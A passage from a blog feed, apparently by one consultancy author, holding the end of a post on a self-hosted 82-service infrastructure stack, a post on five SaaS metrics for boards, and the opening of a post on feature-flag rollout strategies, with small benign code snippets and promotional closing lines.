&lt;p&gt;&lt;strong&gt;Proxmox VE&lt;/strong&gt; as the hypervisor. Running LXC containers for lightweight isolation between tenants. The host server has 13GB RAM, NVMe storage across multiple logical volumes, and an NVIDIA GTX 1650 for AI inference workloads.&lt;/p&gt;

&lt;p&gt;Why Proxmox over bare Linux? Live migration, snapshot-based backups, web UI for emergency management, and proper resource isolation between workloads. It's the enterprise hypervisor that's actually free.&lt;/p&gt;

&lt;p&gt;Storage layout:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;/mnt/containers&lt;/code&gt; (148GB): Docker data root — all container images and volumes&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/mnt/projects&lt;/code&gt; (84GB): Git repositories, CI/CD artifacts, application code&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/mnt/databases&lt;/code&gt; (15GB): PostgreSQL, Redis, FalkorDB, SQLite databases&lt;/li&gt;
&lt;li&gt;Root (69GB): OS, configs, logs&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  The Networking Layer
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Traefik&lt;/strong&gt; as the reverse proxy. Auto-discovers Docker containers via labels, provisions Let's Encrypt SSL, handles routing, load balancing, and rate limiting. Configuration is entirely label-based — no nginx configs to maintain.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cloudflare Tunnels&lt;/strong&gt; for zero-trust access. No ports open on the firewall. Not 80, not 443, not SSH. Everything routes through Cloudflare's network, which handles DDoS protection, CDN caching, and access control. This is genuinely more secure than most cloud deployments.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Authelia&lt;/strong&gt; for single sign-on. One login across all 82 services. TOTP two-factor authentication. Session management. Access policies per-service. No paying $15/user/month for Auth0 or Okta.&lt;/p&gt;

&lt;p&gt;The networking stack gives us: automatic SSL, zero-trust access, SSO, DDoS protection, and CDN caching. Total cost: $0 (Cloudflare free tier + open-source tools).&lt;/p&gt;

&lt;h2&gt;
  
  
  The Monitoring Stack
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Prometheus&lt;/strong&gt; scrapes metrics from every container every 15 seconds. Recording rules pre-compute expensive queries. 90-day retention.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Grafana&lt;/strong&gt; visualizes everything. Three-tier dashboard hierarchy: overview, service detail, and debug dashboards. Burn-rate alerts instead of static thresholds to minimize false alarms.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Loki + Promtail&lt;/strong&gt; for centralized logging. Every container's stdout goes to Loki, queryable via the same Grafana interface. LogQL queries correlate logs with metrics during incidents.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Uptime Kuma&lt;/strong&gt; for external monitoring. 28 monitors checking every service from outside the network. If our server is unreachable, we know within 60 seconds.&lt;/p&gt;

&lt;p&gt;Alert routing: Prometheus → Grafana → ntfy push notifications → phone. Average alert-to-acknowledgment time: 3 minutes.&lt;/p&gt;

&lt;h2&gt;
  
  
  The CI/CD Layer
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Gitea&lt;/strong&gt; as the Git host. Self-hosted GitHub alternative with Actions support. All repositories push-mirror to GitHub for redundancy, but Gitea is the primary for development.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Gitea Actions&lt;/strong&gt; for CI/CD. Docker-based runners execute on the same host. Build, test, security scan, deploy — all triggered on push. Average pipeline: 90 seconds from push to production.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Docker Registry&lt;/strong&gt; (self-hosted). Built images stay local. No pulling from Docker Hub on every deploy. Faster, more reliable, no rate limits.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Data Layer
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;PostgreSQL&lt;/strong&gt; for relational data. Shared across services with schema-level isolation. Daily automated backups with point-in-time recovery.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Redis&lt;/strong&gt; for caching and session storage. Sub-millisecond reads. Pub/sub for real-time features.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;FalkorDB&lt;/strong&gt; for graph data. Knowledge graphs, relationship mapping, semantic search. Runs on the Redis wire protocol.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SQLite&lt;/strong&gt; for lightweight applications that don't need a full PostgreSQL database. Sometimes the right answer is the simplest one.&lt;/p&gt;

&lt;p&gt;All databases back up nightly to an off-site location. Retention: 30 days of daily snapshots.&lt;/p&gt;
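&lt;p&gt;The 30-day window can be enforced with a small pruning pass. A sketch under the assumption that snapshot names carry a YYYY-MM-DD prefix; the naming scheme is illustrative, not this stack's actual backup layout:&lt;/p&gt;

```python
# Prune dated snapshots older than the retention window. Assumes
# snapshot names start with an ISO date, e.g. "2026-04-27-postgres.tar.gz".
from datetime import date, timedelta

def snapshots_to_delete(snapshot_names, today, keep_days=30):
    """Return the names whose embedded date falls outside the window."""
    cutoff = today - timedelta(days=keep_days)
    stale = []
    for name in snapshot_names:
        snap_date = date.fromisoformat(name[:10])
        if cutoff > snap_date:
            stale.append(name)
    return stale
```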

&lt;h2&gt;
  
  
  The AI/ML Layer
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Ollama&lt;/strong&gt; running Gemma and other open-source models. Local inference on the GTX 1650 — 4GB VRAM is enough for 7B models quantized to 4-bit.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;vLLM&lt;/strong&gt; for production inference endpoints. OpenAI-compatible API. Model swapping without downtime.&lt;/p&gt;

&lt;p&gt;This is why the GTX 1650 is in the server. For $200 in hardware, we have unlimited local AI inference with no per-token API costs. Classification, summarization, embedding generation — all free after the hardware purchase.&lt;/p&gt;
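&lt;p&gt;The "4GB is enough" claim follows from simple arithmetic: weights take parameters times bits per weight, divided by 8 bits per byte. KV cache and runtime buffers come on top, which is why the fit is tight but workable:&lt;/p&gt;

```python
# Back-of-envelope weight memory for a quantized model.

def weight_gb(params_billion, bits_per_weight):
    return params_billion * bits_per_weight / 8

print(weight_gb(7, 4))   # 3.5 GB of weights, a tight fit on a 4GB card
print(weight_gb(7, 16))  # 14.0 GB at full precision
```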

&lt;h2&gt;
  
  
  The Automation Layer
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;n8n&lt;/strong&gt; for workflow automation. 14 active workflows handling: content scheduling, email processing, social media posting, webhook routing, and monitoring integrations.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cron + systemd&lt;/strong&gt; for lightweight scheduling. Anything that doesn't need n8n's visual builder runs as a systemd timer.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Custom scripts&lt;/strong&gt; for domain-specific automation. LinkedIn growth engine, content pipeline dispatcher, analytics collection — all containerized, all monitored.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Real Cost Comparison
&lt;/h2&gt;

&lt;p&gt;Here's what the equivalent infrastructure would cost on AWS:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Self-Hosted&lt;/th&gt;
&lt;th&gt;AWS Equivalent&lt;/th&gt;
&lt;th&gt;Monthly AWS Cost&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Compute (82 containers)&lt;/td&gt;
&lt;td&gt;Included&lt;/td&gt;
&lt;td&gt;ECS/Fargate&lt;/td&gt;
&lt;td&gt;$1,200&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PostgreSQL&lt;/td&gt;
&lt;td&gt;Included&lt;/td&gt;
&lt;td&gt;RDS&lt;/td&gt;
&lt;td&gt;$180&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Redis&lt;/td&gt;
&lt;td&gt;Included&lt;/td&gt;
&lt;td&gt;ElastiCache&lt;/td&gt;
&lt;td&gt;$120&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Monitoring (Prometheus+Grafana)&lt;/td&gt;
&lt;td&gt;Included&lt;/td&gt;
&lt;td&gt;CloudWatch + Managed Grafana&lt;/td&gt;
&lt;td&gt;$350&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CI/CD&lt;/td&gt;
&lt;td&gt;Included&lt;/td&gt;
&lt;td&gt;CodePipeline + ECR&lt;/td&gt;
&lt;td&gt;$80&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Git hosting&lt;/td&gt;
&lt;td&gt;Included&lt;/td&gt;
&lt;td&gt;CodeCommit or GitHub Teams&lt;/td&gt;
&lt;td&gt;$50&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reverse proxy + SSL&lt;/td&gt;
&lt;td&gt;Included&lt;/td&gt;
&lt;td&gt;ALB + ACM&lt;/td&gt;
&lt;td&gt;$100&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AI inference&lt;/td&gt;
&lt;td&gt;Included&lt;/td&gt;
&lt;td&gt;SageMaker&lt;/td&gt;
&lt;td&gt;$300&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Logging&lt;/td&gt;
&lt;td&gt;Included&lt;/td&gt;
&lt;td&gt;CloudWatch Logs&lt;/td&gt;
&lt;td&gt;$150&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~$30 electricity&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;$2,530/month&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;That's $30,360 per year in cloud costs eliminated. The server hardware (roughly $2,000) paid for itself in the first month.&lt;/p&gt;

&lt;h2&gt;
  
  
  When Self-Hosting Is Wrong
&lt;/h2&gt;

&lt;p&gt;Self-hosting isn't for everyone. Don't do this if:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;You don't have someone who understands Linux.&lt;/strong&gt; When things break at 3am, you need someone who can SSH in and debug.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;You need five-nines uptime.&lt;/strong&gt; Single-server self-hosting gives you three to four nines. For five nines, you need the geographic redundancy that the cloud provides naturally.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Your team is tiny and shipping is the priority.&lt;/strong&gt; If you're a team of 3 racing to product-market fit, managed services save engineering time that's better spent on product.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compliance requires specific certifications.&lt;/strong&gt; SOC 2, HIPAA, or PCI compliance is dramatically easier to achieve on certified cloud infrastructure than on a self-hosted stack.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Self-hosting makes sense when you have sustained workloads, predictable traffic, a team that can maintain infrastructure, and a desire for full control and zero vendor lock-in.&lt;/p&gt;

&lt;h2&gt;
  
  
  Getting Started
&lt;/h2&gt;

&lt;p&gt;The 2026 self-hosting starter path:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Start small.&lt;/strong&gt; One used mini-PC ($200-400), Proxmox, Docker Compose with Traefik + monitoring.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Add services incrementally.&lt;/strong&gt; Move one cloud service at a time. Start with the expensive ones.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cloudflare Tunnel from day one.&lt;/strong&gt; Zero-trust access without port forwarding. Secure by default.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Monitor everything.&lt;/strong&gt; Prometheus + Grafana + alerting before you add any production workloads.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Backup to external storage.&lt;/strong&gt; Never have all your eggs in one physical location.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The complete Docker Compose file for our 82-service stack is available in the guide linked below. It's opinionated, tested in production for over a year, and ready to deploy.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;At &lt;a href="https://www.techsaas.cloud/services/" rel="noopener noreferrer"&gt;TechSaaS&lt;/a&gt;, we help teams design and implement self-hosted infrastructure that matches or exceeds cloud reliability. Whether you're repatriating from cloud or building from scratch, we bring the architecture expertise so your team doesn't have to learn through expensive mistakes.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>SaaS Metrics That Matter: The 5 Numbers Your Board Should Actually Care About</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Wed, 22 Apr 2026 06:00:18 +0000</pubDate>
      <link>https://forem.com/yash_pritwani_07a77613fd6/saas-metrics-that-matter-the-5-numbers-your-board-should-actually-care-about-5hek</link>
      <guid>https://forem.com/yash_pritwani_07a77613fd6/saas-metrics-that-matter-the-5-numbers-your-board-should-actually-care-about-5hek</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/saas-metrics-beyond-mrr-churn" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;








&lt;h1&gt;
  
  
  SaaS Metrics That Matter: The 5 Numbers Your Board Should Actually Care About
&lt;/h1&gt;

&lt;p&gt;Every SaaS board meeting starts the same way. MRR is up. Churn is down. Everyone nods. The meeting ends.&lt;/p&gt;

&lt;p&gt;Six months later the company is running out of runway and nobody can explain why the numbers looked good but the business isn't working.&lt;/p&gt;

&lt;p&gt;MRR and churn are lagging indicators. They tell you what already happened. They're the rearview mirror of your business. By the time churn spikes, the customers have already been unhappy for months. By the time MRR stalls, the pipeline has been dry for a quarter.&lt;/p&gt;

&lt;p&gt;After building analytics infrastructure for 12 SaaS companies — from seed-stage to Series C — these are the five metrics that actually predict whether your business will be alive in 18 months. They're leading indicators. They tell you what's about to happen, not what already did.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Net Revenue Retention (NRR)
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;What it is:&lt;/strong&gt; The percentage of revenue you retain from existing customers after accounting for upgrades, downgrades, and churn. It's your expansion revenue minus your contraction and churn.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Formula:&lt;/strong&gt; (Starting MRR + Expansion - Contraction - Churned MRR) / Starting MRR × 100&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why it matters more than gross churn:&lt;/strong&gt; A 5% monthly churn rate sounds bad. But if your remaining customers are expanding by 8%, your NRR is 103% — meaning you grow even without new customers. Gross churn hides this crucial nuance.&lt;/p&gt;
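&lt;p&gt;As a sanity check, the formula applied to the example above (rounding is just for display):&lt;/p&gt;

```python
# Net Revenue Retention, per the formula above, with the 5% churn /
# 8% expansion example from the text on a $100K starting base.

def nrr(starting_mrr, expansion, contraction, churned_mrr):
    retained = starting_mrr + expansion - contraction - churned_mrr
    return round(retained / starting_mrr * 100, 1)

print(nrr(100_000, 8_000, 0, 5_000))  # 103.0
```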

&lt;p&gt;&lt;strong&gt;Benchmarks:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Below 90%: You're dying. Existing customers are shrinking faster than you can replace them.&lt;/li&gt;
&lt;li&gt;90-100%: Treading water. Growth depends entirely on new customer acquisition.&lt;/li&gt;
&lt;li&gt;100-110%: Healthy. Some organic growth from existing base.&lt;/li&gt;
&lt;li&gt;110-120%: Strong. Expansion is a meaningful growth engine.&lt;/li&gt;
&lt;li&gt;120%+: Elite. You could stop selling to new customers and still grow. Snowflake (130%), Datadog (125%), Twilio (127%).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The insight:&lt;/strong&gt; If your NRR is below 100%, your sales team is filling a leaky bucket. Every new customer you close is partially offset by revenue you're losing from existing customers. Fix retention before you scale acquisition.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Revenue Per Employee (RPE)
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;What it is:&lt;/strong&gt; Total ARR divided by total headcount. The simplest measure of organizational efficiency.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why your board should watch this:&lt;/strong&gt; It's the earliest warning sign of an unsustainable business. You can grow MRR by hiring more salespeople, but if revenue per employee is declining, you're buying growth by spending future runway.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Benchmarks:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Below $100K RPE: Dangerously inefficient. Common in early-stage with heavy R&amp;amp;D investment.&lt;/li&gt;
&lt;li&gt;$100K-$200K RPE: Acceptable for growth-stage companies still building the product.&lt;/li&gt;
&lt;li&gt;$200K-$300K RPE: Healthy. The team is productive and the product sells efficiently.&lt;/li&gt;
&lt;li&gt;$300K+ RPE: Highly efficient. Usually means strong product-led growth or excellent sales efficiency.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The insight:&lt;/strong&gt; When RPE drops two quarters in a row, you're hiring faster than you're growing. Either your new hires aren't productive yet (3-6 month ramp), or you're over-hiring for the growth rate. Either way, the board should be asking why before the next round of fundraising.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Time to Value (TTV)
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;What it is:&lt;/strong&gt; The number of days between a customer signing up and reaching their first meaningful outcome — the "aha moment" that makes them sticky.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why it predicts survival:&lt;/strong&gt; TTV directly correlates with retention. Customers who reach value in the first week retain at 2-3x the rate of customers who take a month. Every day of friction between signup and value is a day the customer might leave.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How to measure it:&lt;/strong&gt; Define your activation event — the action that correlates most strongly with long-term retention. For Slack, it was 2,000 messages sent. For Zoom, it was the first meeting with 3+ participants. For your product, it's the specific action after which customers almost never churn.&lt;/p&gt;
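&lt;p&gt;Once the activation event is defined, TTV is a straightforward query over event timestamps. A minimal sketch; the data shapes are placeholders for whatever your analytics store actually provides:&lt;/p&gt;

```python
# Median days from signup to first activation event across a cohort.
from datetime import datetime
from statistics import median

def time_to_value_days(signups, first_activations):
    """signups / first_activations: dicts of user_id to datetime.
    Users who never activated are excluded here; track that drop-off
    rate separately, since it is its own warning sign."""
    deltas = []
    for user, signed_up in signups.items():
        if user in first_activations:
            deltas.append((first_activations[user] - signed_up).days)
    return median(deltas) if deltas else None
```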

&lt;p&gt;&lt;strong&gt;Benchmarks:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Under 1 day: Exceptional. Usually product-led with self-serve onboarding.&lt;/li&gt;
&lt;li&gt;1-7 days: Good. Most successful B2B SaaS hits value within a week.&lt;/li&gt;
&lt;li&gt;7-30 days: Acceptable for complex enterprise products with implementation requirements.&lt;/li&gt;
&lt;li&gt;30+ days: Dangerous. You're losing customers before they ever experience the product.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The insight:&lt;/strong&gt; If TTV is growing, your product is getting more complex without getting more valuable. Simplify onboarding. Remove steps. Pre-configure everything possible. The fastest path to retention is the fastest path to value.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Expansion Revenue Percentage
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;What it is:&lt;/strong&gt; The percentage of your new MRR that comes from existing customers upgrading, buying add-ons, or increasing usage — versus new logo acquisition.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Formula:&lt;/strong&gt; Expansion MRR / Total New MRR × 100&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why it's more important than new customer count:&lt;/strong&gt; Expansion revenue costs roughly a fifth to a seventh of what new logo revenue costs to acquire. Your CAC for existing customers is nearly zero — they already trust you, already have the product integrated, already know the value. Every dollar of expansion revenue has dramatically better unit economics.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Benchmarks:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Below 20%: Over-dependent on new sales. Your existing customers aren't finding enough value to pay more.&lt;/li&gt;
&lt;li&gt;20-30%: Healthy mix. Most growth is net-new but expansion contributes meaningfully.&lt;/li&gt;
&lt;li&gt;30-40%: Strong. Your product grows with customers. Pricing captures increasing value.&lt;/li&gt;
&lt;li&gt;40%+: Exceptional. Your product is truly embedded in customer workflows and grows as they grow.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The insight:&lt;/strong&gt; If expansion revenue is below 20%, ask yourself: do customers have a natural path to pay you more? Is there usage-based pricing? Are there meaningful add-ons? If the only way to grow revenue is acquiring new logos, you're building a linear business in a world that rewards compounding ones.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. CAC Payback Period
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;What it is:&lt;/strong&gt; The number of months it takes to recoup the cost of acquiring a customer through their recurring revenue. It tells you how long your money is "underwater" before a customer becomes profitable.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Formula:&lt;/strong&gt; CAC / (MRR × Gross Margin %)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why it's better than CAC alone:&lt;/strong&gt; A $50K CAC is fine if the customer pays $10K/month. A $5K CAC is terrible if the customer pays $100/month and churns at month 6. Payback period contextualizes acquisition cost against the actual revenue pattern.&lt;/p&gt;
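&lt;p&gt;The formula applied to the two contrasting examples above makes the point concrete (illustrative numbers):&lt;/p&gt;

```python
# CAC payback, per the formula above, for the two examples in the text.

def cac_payback_months(cac, mrr, gross_margin):
    return cac / (mrr * gross_margin)

# $50K CAC on a $10K/month customer at 80% margin: ~6 months underwater.
print(round(cac_payback_months(50_000, 10_000, 0.80), 1))
# $5K CAC on a $100/month customer: ~62 months. A customer churning
# at month 6 never comes close to paying back.
print(round(cac_payback_months(5_000, 100, 0.80), 1))
```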

&lt;p&gt;&lt;strong&gt;Benchmarks:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Under 6 months: Excellent. Money comes back fast. You can reinvest aggressively.&lt;/li&gt;
&lt;li&gt;6-12 months: Good. Standard for healthy B2B SaaS. Most VCs expect this.&lt;/li&gt;
&lt;li&gt;12-18 months: Concerning. Cash is tied up too long. Growth requires heavy funding.&lt;/li&gt;
&lt;li&gt;18+ months: Unsustainable without deep pockets. You're essentially lending money to customers for over a year before seeing returns.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The insight:&lt;/strong&gt; If your payback period is growing while your sales velocity stays the same, you're spending more to acquire lower-value customers. Either your ICP has shifted, your pricing is wrong, or your sales team is going downmarket to hit targets.&lt;/p&gt;

&lt;h2&gt;
  
  
  Putting It Together: The Dashboard That Matters
&lt;/h2&gt;

&lt;p&gt;Stop showing your board a wall of 20 metrics. Show them these five in a single-page dashboard with trend lines:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Current&lt;/th&gt;
&lt;th&gt;Trend&lt;/th&gt;
&lt;th&gt;Target&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;NRR&lt;/td&gt;
&lt;td&gt;108%&lt;/td&gt;
&lt;td&gt;↑&lt;/td&gt;
&lt;td&gt;&amp;gt;115%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RPE&lt;/td&gt;
&lt;td&gt;$185K&lt;/td&gt;
&lt;td&gt;→&lt;/td&gt;
&lt;td&gt;&amp;gt;$200K&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TTV&lt;/td&gt;
&lt;td&gt;4.2 days&lt;/td&gt;
&lt;td&gt;↓&lt;/td&gt;
&lt;td&gt;&amp;lt;3 days&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Expansion Revenue&lt;/td&gt;
&lt;td&gt;24%&lt;/td&gt;
&lt;td&gt;↑&lt;/td&gt;
&lt;td&gt;&amp;gt;30%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CAC Payback&lt;/td&gt;
&lt;td&gt;9.8 mo&lt;/td&gt;
&lt;td&gt;→&lt;/td&gt;
&lt;td&gt;&amp;lt;8 months&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;If all five trend in the right direction, your business is compounding. If two or more are trending wrong, you have a structural problem that MRR growth is masking. The board should be asking about root causes, not celebrating topline numbers.&lt;/p&gt;

&lt;h2&gt;
  
  
  The One Metric to Rule Them All
&lt;/h2&gt;

&lt;p&gt;If you can only track one beyond MRR, make it NRR. It's the single strongest predictor of SaaS outcomes. Companies with NRR above 120% have a 95% probability of reaching $100M ARR if they maintain it for 3+ years. Companies below 90% NRR almost never recover without a fundamental product change.&lt;/p&gt;

&lt;p&gt;NRR is the metric that tells you whether your product is genuinely solving a growing problem for your customers, or whether you're churning through them faster than you can find new ones.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;At &lt;a href="https://www.techsaas.cloud/services/" rel="noopener noreferrer"&gt;TechSaaS&lt;/a&gt;, we build custom analytics dashboards that make these metrics visible, actionable, and automated. If your board is still squinting at spreadsheets instead of real-time dashboards, we should talk.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>Feature Flagging Strategies for Continuous Deployment: Ship Daily Without Breaking Anything</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Tue, 21 Apr 2026 06:00:06 +0000</pubDate>
      <link>https://forem.com/yash_pritwani_07a77613fd6/feature-flagging-strategies-for-continuous-deployment-ship-daily-without-breaking-anything-43ci</link>
      <guid>https://forem.com/yash_pritwani_07a77613fd6/feature-flagging-strategies-for-continuous-deployment-ship-daily-without-breaking-anything-43ci</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/feature-flags-continuous-deployment-strategy" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;








&lt;h1&gt;
  
  
  Feature Flagging Strategies for Continuous Deployment: Ship Daily Without Breaking Anything
&lt;/h1&gt;

&lt;p&gt;We deploy to production 12 times a day. Our deployment success rate is 99.7%. When the 0.3% fails, we roll back in under 60 seconds without a single user noticing.&lt;/p&gt;

&lt;p&gt;This isn't because we write perfect code. It's because every feature ships behind a flag, and every flag follows a progressive rollout strategy. Deployments stopped being events and became routine. Here's exactly how we set this up — and how you can too.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Problem With Traditional Deployments
&lt;/h2&gt;

&lt;p&gt;The traditional deployment model is binary: your code is either live or it isn't. This creates a terrifying coupling between "deploying code" and "releasing features." Your deploy pipeline becomes a high-stakes ritual. Teams batch changes into big releases because small frequent deploys feel risky. Big releases have more surface area for bugs. Bugs in big releases are harder to isolate. It's a vicious cycle.&lt;/p&gt;

&lt;p&gt;Feature flags break this coupling. You can deploy code to production that no user ever sees until you're ready. Deployment becomes a non-event — just moving code to servers. Release becomes a separate, controlled decision.&lt;/p&gt;

&lt;h2&gt;
  
  
  Feature Flag Architecture: What Goes Where
&lt;/h2&gt;

&lt;p&gt;A feature flag is conceptually simple — it's an if/else statement:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;feature_flags&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;is_enabled&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;new_checkout_flow&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;current_user&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;new_checkout&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cart&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;legacy_checkout&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cart&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;But the architecture around it matters enormously. Here's our stack:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Flag storage&lt;/strong&gt;: We use a lightweight flag service (you can start with a JSON config file, but graduate to something like Unleash, LaunchDarkly, or Flipt). The flag service holds the rules: who sees what, when, and under what conditions.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Flag evaluation&lt;/strong&gt;: Flags are evaluated at the application layer, not the infrastructure layer. This gives you user-level targeting. You can enable a feature for 1% of users, for users in a specific region, for your QA team, or for a specific account.&lt;/p&gt;

